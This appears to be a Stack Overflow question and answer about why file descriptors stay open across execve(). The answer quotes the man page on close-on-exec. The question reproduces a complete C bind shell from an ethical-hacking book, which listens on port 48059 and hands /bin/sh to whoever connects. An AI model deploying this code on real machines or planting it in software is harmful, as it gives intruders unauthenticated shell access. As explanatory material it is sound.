# Why creating a remote shell using execve doesn't overwrite file descriptors and socket?

Tags: c, linux, sockets, file-descriptor, execve

So I've got this code from *Gray Hat Hacking: The Ethical Hacker’s Handbook, Fourth Edition* :

```
#include<sys/socket.h>                 // libraries used to make a socket
#include<netinet/in.h>                 // defines the sockaddr structure
int main(){
        char * shell[2];               // prep for execve call
        int server,client;             // file descriptor handles
        struct sockaddr_in serv_addr;  // structure to hold IP/port vals
        server=socket(2,1,0);   // build a local IP socket of type stream
        serv_addr.sin_addr.s_addr=0; // set addresses of socket to all local
        serv_addr.sin_port=0xBBBB; // set port of socket, 48059 here
        serv_addr.sin_family=2;   // set native protocol family: IP
        bind(server,(struct sockaddr *)&serv_addr,0x10); // bind socket
        listen(server,0);         // enter listen state, wait for connect
        client=accept(server,0,0);// when connect, return client handle
        /*connect client pipes to stdin,stdout,stderr */
        dup2(client,0);                // connect stdin to client
        dup2(client,1);                // connect stdout to client
        dup2(client,2);                // connect stderr to client
        shell[0]="/bin/sh";            // first argument to execve
        shell[1]=0;                    // terminate array with null
        execve(shell[0],shell,0);      // pop a shell
}
```

According to [execve man page](https://linux.die.net/man/2/execve):

> execve() does not return on success, and the text, data, bss, and stack of the calling process are overwritten by that of the program loaded.

So shouldn't the return value of `socket()`, which -if I understood it well-, is a file descriptor, be overwritten? 
And shouldn't redirection of file descriptors `stdin`, `stdout` and `stderr` be reset to default values? 
If so, how could this program work?

 I probably missunderstood something in about the `execve()` function, or about file descriptors. Or maybe I totaly missunderstood `socket()` function.
Aren't file descriptors stored either into the stack, either into bss section?

Comment: While the code is well-commented, its use of [*magic numbers*](https://en.wikipedia.org/wiki/Magic_number_(programming)) and total lack of error checking still makes it bad.

Comment: The code is just C code to explain you what you're going to do, because it will be transformed into shellcode. So you obviously need to put some magic numbers in there.

Comment: In the `socket` call, do you know what the numbers `2`, `1` and `0` means? No? Then that's why magic numbers should not be used. Especially since the relevant headers are included, which contains the nice symbolic constants that corresponds to those numbers. Even when learning about exploits, good code is good code. And this code is not good.

Comment: For a C program I agree, but this is just a test program that you will need to convert into assembly code yourself, and the book tells you what 2, 1 and 0 means in this case.

Comment: File descriptors are stored in kernel, at least conceptually.

Comment: @el.pescado So is the int value we get using functions such as open() pointing to a kernel thing?

Comment: @Nofix yes. Kernel maintains some information (including open files) about each running process, and file descriptors can be thought as *handles* to parts of that information.

Answer (score 4, accepted):

File descriptors are **not** closed when a new program is executed via one of the `exec` functions.  If they were, there would be no way to attach stdin / stdout / stderr in a terminal to the proper places.

You missed the following paragraph:

> **By default, file descriptors remain open across an `execve()`**.  File
>   descriptors that are marked close-on-exec are closed; see the
>   description
>             of `FD_CLOEXEC` in `fcntl(2)`.  (If a file descriptor is closed, this will cause the release of all record locks obtained on the
>   underlying file
>             by this process.  See `fcntl(2)` for details.)  POSIX.1 says that if file descriptors 0, 1, and 2 would otherwise be closed after a
>   successful
>             `execve()`,  and the process would gain privilege because the set-user_ID or set-group_ID mode bit was set on the executed file,
>   then the system may open an unspecified file for each of these file descriptors.  **As a general principle, no portable  program,  whether 
>   privileged  or
>             not, can assume that these three file descriptors will remain closed across an `execve()`**.